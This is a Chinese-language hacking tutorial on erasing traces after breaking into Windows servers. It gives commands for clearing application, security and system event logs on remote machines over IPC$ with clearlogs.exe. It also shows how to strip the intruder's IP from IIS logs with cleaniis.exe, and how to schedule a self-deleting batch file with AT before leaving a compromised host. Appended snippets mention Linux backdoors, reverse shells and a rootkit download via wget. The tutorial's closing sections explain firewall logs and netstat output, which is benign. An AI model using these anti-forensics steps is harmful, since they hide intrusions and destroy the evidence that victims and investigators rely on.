入侵后痕迹清理

清理你入侵后的三个重要痕迹
应用程序日志
安全日志
系统日志

DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%system32configSecEvent.EVT
系统日志文件:%systemroot%system32configSysEvent.EVT
应用程序日志文件:%systemroot%system32configAppEvent.EVT
FTP日志默认位置:%systemroot%system32logfilesmsftpsvc1,默认每天一个
WWW日志默认位置:%systemroot%system32logfilesw3svc1,默认每天一个日志

以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,
它们这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog

钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录注销失败

怎样删除这些日志: 通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志安全日志应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除.

下面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 这项服务无法接受请求的”暂停” 或”停止” 操作。
怎么清除系统日志.
怎么利用工具清除IIS日志
怎么清除历史和cookie
怎么察看防火墙Blackice的日志
netstat -an 表示的什么意思

————————————————————————————————————–
1.系统日志 通过手工很难清除. 这里我们介绍一个工具 clearlog.exe

使用方法:
Usage: clearlogs [computername] <-app / -sec / -sys>

-app = 应用程序日志
         -sec = 安全日志
         -sys = 系统日志
a. 可以清除远程计算机的日志
** 先用ipc连接上去: net use ipipc$ 密码/user:用户名
** 然后开始清除: 方法 
clearlogs ip -app 这个是清除远程计算机的应用程序日志
clearlogs ip -sec 这个是清除远程计算机的安全日志
clearlogs ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面
   然后清除.   方法:

 

clearlogs   -app 这个是清除远程计算机的应用程序日志
clearlogs   -sec 这个是清除远程计算机的安全日志
clearlogs   -sys 这个是清除远程计算机的系统日志

安全日志已经被清除.Success: The log has been cleared   成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.
例如建立一个 c.bat

rem ============================== 开始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 结束

在你的计算机上面测试的时候 可以不要 @echo off   可以显示出来. 你可以看到结果
第一行表示: 运行时不显示窗口
第二行表示: 清除应用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系统日志
第五行表示: 删除 clearlogs.exe 这个工具
第六行表示: 删除 c.bat 这个批处理文件
第七行表示: 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法

AT 时间 c:c.bat

之后你就可以安全离开了. 这样才更安全一点.

————————————————————————————————————–
2.清除iis日志:
工具:cleaniis.exe
使用方法:
iisantidote <logfile dir> <ip or string to hide>
iisantidote <logfile dir><ip or string to hide> stop
stop opiton will stop iis before clearing the files and restart it after
<logfile dir> exemple : c:winntsystem32logfilesw3svc1 dont forget the

使用方法解释:
cleaniis.exe iis日志存放的路径 清除参数

什么意思呢??我来给大家举个例子吧:
cleaniis c:winntsystem32logfilesw3svc1 192.168.0.1
这个表示清除log中所有此IP(192.168.0.1)地址的访问记录.     —–推荐使用这种方法

cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/
这个表示清除这个目录里面的所以的日志

c:winntsystem32logfilesw3svc1 代表是iis日志的位置(windows nt/2000) 这个路径可以改变
c:windowssystem32logfilesw3svc1 代表是iis日志的位置(windows xp/2003) 这个路径可以改变

这个测试表示 在日志里面没有这个ip地址.
我们看一下日志的路径     再来看一下
我们的ip(192.168.0.1)已经没有了.
已经全部清空. 同样这个也可以建立批处理. 方法同上面的那个.

————————————————————————————————————–
3.清除历史记录及运行的日志:
cleaner.exe
直接运行就可以了.

————————————————————————————————————–
4.察看blackice的日志.
这个地方我们可以清除的看到   防火墙的日志.

这个表示 有人发过来带有病毒的email附件.   ip是: 220.184.153.116
tcp_probe_other   表示 通过tcp 扫描 或者利用别的和你建立连接 通信
这个表示通过端口 80 扫描iis
病毒 nimda
这里需要很多的计算机协议知识. 同时也需要对英语有了解
才能更好的分析 如果对英语不好 你可以装一个金山词霸.
一般情况下 我们可以 对一些可以不用管.
一般这三种情况 不用去管.
最上面的 critical 这个   可以去关注一下 . 一般是确实有别的计算机扫描或者入侵你的计算机

count 代表次数     intruder 是对方的ip   event 是通过什么方式(协议) 扫描或者想入侵的
time表示时间

5.————————————————————————————————————–
netstat -an 表示什么意思?
使用这个命令可以察看到和本机的所有的连接.

Proto   Local Address           Foreign Address         State
协议     本地端口及IP地址         远程端口及IP地址       状态

LISTENING   监听状态   表示等待对方连接

ESTABLISHED   正在连接着.

TCP   协议是TCP

UDP   协议是UDP

TCP     192.168.0.10:1115       61.186.97.54:80         ESTABLISHED
这个表示   利用tcp协议 本机ip(192.168.0.10)通过端口:1115 和远程ip(61.186.97.54)端口:80连接
80端口 表示   http   就是你在访问这个网站.

一般情况下远程ip的端口: 80 21 8000 这个都是正常的. 如果是别的 就可以看一下你的计算机了。

本文转自https://www.xiaohuai.com/250

时间: 2024-08-02 07:05:03

入侵后痕迹清理的相关文章

linux入侵控制与痕迹清理

后门 (1)开机自动反弹shell (2)linux后门 Rookit 目前常用的有:t0rn /mafix/enyelkm 等 mafix rootkit Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号. URL:http://forum.eviloctal.com/attachment.php?aid=13419 安装及使用: wget http://forum.eviloctal.com/attachme

Linux主机被入侵后的处理案例

一次Linux被入侵后的分析 下面通过一个案例介绍下当一个服务器被rootkit入侵后的处理思路和处理过程,rootkit攻击是Linux系统下最常见的攻击手段和攻击方式. 1.受攻击现象 这是一台客户的门户网站服务器,托管在电信机房,客户接到电信的通知:由于此服务器持续对外发送数据包,导致100M带宽耗尽,于是电信就切断了此服务器的网络.此服务器是Centos5.5版本,对外开放了80.22端口.从客户那里了解到,网站的访问量并不大,所以带宽占用也不会太高,而耗尽100M的带宽是绝对不可能的,

服务器被入侵后的故障检测思路

下面通过一个案例介绍下当一个服务器被rootkit入侵后的处理思路和处理过程,rootkit攻击是Linux系统下最常见的攻击手段和攻击方式. 1.受攻击案例描述 这是一台客户的门户网站服务器,托管在电信机房,客户接到电信的通知:由于此服务器持续对外发送数据包,导致100M带宽耗尽,于是电信就切断了此服务器的网络.此服务器是Centos5.5版本,对外开放了80.22端口. 从客户那里了解到,网站的访问量并不大,所以带宽占用也不会太高,而耗尽100M的带宽是绝对不可能的,那么极有可能是服务器遭受

公司服务器被黑客入侵后你要如何处理?

第一步:断网,无线和有线的都要断开 第二步:分析登录文件信息,搜索可能侵入的途径 被入侵后,决不是重新安装就可以了,还要分析主机被入侵的原因和途径,如果找出了问题点,就可能使您的主机以后更安全,同时也提高了自己的Linux水平. 如果不知道如何找出入侵途径,下次还有可能发生同样的事.一般: (1).分析登录文件:可以通过分析一些主要的登录文件找到对方的IP以及可能出现的漏洞.一般分析的文件为:/var/log/messages和/var/log/secure文件.还可以使用last命令找出最后一

capistrano 部署后自动清理之前的release

(1)如何自动清理老的release capistrano 部署后自动清理老 release,默认只保留 5 个 releases 添加下面代码到 config/deploy.rb # if you want to clean up old releases on each deploy uncomment this: after "deploy:restart", "deploy:cleanup" (2)如何人指定保留数量如果想制定具体保留几个releases文件

docker被入侵后.............

服务器上线后,怎么发现总有个 xmrig 的容器在跑,删了还出来 那么恭喜你!!你的服务器已经被入侵了!! $ docker ps IMAGE               COMMAND                  CREATED           STATUS                           PORTS    NAMES linuxrun/cpu2    "./xmrig --algo=cr...."    4 hours ago     Exited (

linux入侵后的必要工作。及rootkit的监测工具rkhunter简析

rootkit是是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马.    一般分为文件级别和内核级别:        文件级别的rootkit一般是通过程序漏洞或者系统漏洞进入系统后,通过修改系统的重要文件来达到隐藏自己的目的.        内核级rootkit是比文件级rootkit更高级的一种入侵方式,它可以使攻击者获得对系统底层的完全控制权,此时攻击者可以修改系统内核

(dfs痕迹清理兄弟篇)bfs作用效果的后效性

dfs通过递归将每种情景分割在不同的时空,但需要对每种情况对后续时空造成的痕迹进行清理(这是对全局变量而言的,对形式变量不需要清理(因为已经被分割在不同时空)) bfs由于不是利用递归则不能分割不同的时空,但其利用队列将不同时空下的步骤在时间上进行同步(但队列内部的并不都是同一时间的) 但必须要区分在队列内的与从队列里拿出来的时间关系,所以对于类似于取钥匙开门的操作,应该判定在钥匙位置被提出队列时才能触发开门功能,而不能认为钥匙在队列时就能开门也就是bfs的作用效果要放在位置被提出队列时展开,而

记一次Linux服务器被入侵后的检测过程

作者 | 哈兹本德     来源 | FreeBuf 0×00 前言 故事是这样的,大年初一,客户反应他们服务器无法访问,查看路由,发现某oracle+tomcat服务器UDP流量超大,把带宽占完了,过年嘛,客户那边先找了当地的技术人员弄了几天没搞定,然后没办法大年初三的找我们弄-顾客是上帝! 其实吧以前也遇到过这类攻击,当时某IDC都被打瘫了,只不过马儿不在我们的设备上,所以没过多关注- 0×01 查找木马 首先SSH登陆,top查看进程,发现奇怪名字的命令gejfhzthbp,一看就感觉有问